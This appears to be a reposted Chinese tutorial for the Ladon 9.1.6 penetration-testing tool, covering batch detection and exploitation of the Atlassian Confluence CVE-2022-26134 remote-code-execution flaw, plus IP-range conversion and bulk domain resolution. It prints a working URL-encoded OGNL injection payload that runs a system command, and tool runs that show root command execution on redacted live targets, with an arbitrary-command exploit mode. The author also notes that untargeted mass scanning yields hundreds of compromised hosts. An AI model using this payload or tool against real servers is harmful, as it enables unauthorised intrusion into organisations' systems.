Ladon 9.1.6 新增功能
Ladon 9.1.6 20220608
[-2022-26134 批量检测Atlassian Confluence CVE-2022-26134 ]CVE
[-2022-26134 Atlassian Confluence CVE-2022-26134 EXP ]EXP
[ip24格式(192.168.1.1/24) ]IP24 批量IP转成
[ip C格式(192.168.1.) ]IPC 批量IP转成
[192.168.) ]IPB 批量IP转成ip B格式(
[ ]Domain2IP Host2IP 机器名转IP 域名解析IP
漏洞信息
澳大利亚软件公司认为网络安全公司Volexity发现了该漏洞,该漏洞被跟踪为CVE-2022-26134。美国网络安全和基础设施局 (CISA) 强烈建议组织查看Confluence 安全公告 2022-06-02以获取更多信息。CISA 敦促使用受影响的 Atlassian 的 Confluence 服务器和数据中心产品的组织阻止所有进出这些设备的互联网流量,直到更新可用并成功应用。根据 Volexity 的说法,“攻击者使用了一个零日漏洞,现在分配了 CVE-2022-26134,它允许在服务器上执行未经身份验证的远程代码。” 分析继续警告说“这些类型的漏洞是危险的,因为只要可以向 Confluence Server 系统发出 Web 请求,攻击者就可以在没有凭据的情况下执行命令并完全控制易受攻击的系统。”
影响版本
Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
PS: 实际影响不只以上版本,可以看到下图测试的7.12.2也是成功的
POC
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
复现,可以docker,也可以直接漏洞引擎批量,不指定目标的话成功率顶高的,随便扫一下就几百个成功的,但是匹配指定目标C段IP,一个都没有。
批量检测
C:Usersk8gege>Ladon url.txt CVE-2022-26134
Ladon 9.1.6
Start: 2022-06-09 00:25:46
PC Name: WIN7 Lang: zh-CN
Runtime: .net 2.0 me: x86 OS: x86
OS Name: Microsoft Windows 7 旗舰版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 5060 CurrentProcess: Ladon
FreeSpace: Disk C: 4393 MB
load CVE-2022-26134
scan url.txt (URL)
=============================================
https://xxxxxxxx CVE-2022-26134 uid=0(root) gid=0(root) groups=0(root),1(b
in),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27
(video)
=============================================
EXP-2022-26134
单个检测,或执行任意命令
C:Usersk8gege>Ladon EXP-2022-26134 https://xxxxxxxx id
Ladon 9.1.6
Start: 2022-06-09 00:46:12
PC Name: WIN7 Lang: zh-CN
Runtime: .net 2.0 me: x86 OS: x86
OS Name: Microsoft Windows 7 旗舰版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 5552 CurrentProcess: Ladon
FreeSpace: Disk C: 4393 MB
Load EXP-2022-26134
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
(wheel),11(floppy),20(dialout),26(tape),27(video)
批量IP转换
为了方便批量检测各种漏洞,或者匹配漏洞结果是否出现目标C段IP,新增将ip.txt处理成C段或B段格式,用法如下:
C:Usersk8gege>Ladon ip.txt IP24
Ladon 9.1.6
Start: 2022-06-08 08:17:20
PC Name: WIN7 Lang: zh-CN
Runtime: .net 2.0 me: x86 OS: x86
OS Name: Microsoft Windows 7 旗舰版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 4224 CurrentProcess: Ladon
FreeSpace: Disk C: 4415 MB
load IP2ip24
scan ip.txt (IP)
=============================================
10.10.8.1/24
192.168.1.1/24
123.8.78.1/24
172.10.5.1/24
=============================================
OnlinePC:0
C:Usersk8gege>Ladon ip.txt IPC
Ladon 9.1.6
Start: 2022-06-08 08:17:24
PC Name: WIN7 Lang: zh-CN
Runtime: .net 2.0 me: x86 OS: x86
OS Name: Microsoft Windows 7 旗舰版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 6656 CurrentProcess: Ladon
FreeSpace: Disk C: 4416 MB
load IP2ipc
scan ip.txt (IP)
=============================================
123.8.78.
192.168.1.
172.10.5.
10.10.8.
=============================================
OnlinePC:0
批量域名解析
C:Usersk8gege>Ladon domain.txt Domain2IP
Ladon 9.1.6
Start: 2022-06-08 08:36:01
PC Name: WIN7 Lang: zh-CN
Runtime: .net 2.0 me: x86 OS: x86
OS Name: Microsoft Windows 7 旗舰版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 3612 CurrentProcess: Ladon
FreeSpace: Disk C: 4410 MB
load Domain2IP
scan domain.txt (Domain)
=============================================
123.151.137.18
220.181.38.251
183.3.226.35
61.129.7.47
220.181.38.148
=============================================
原文始发于微信公众号(K8实验室):[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论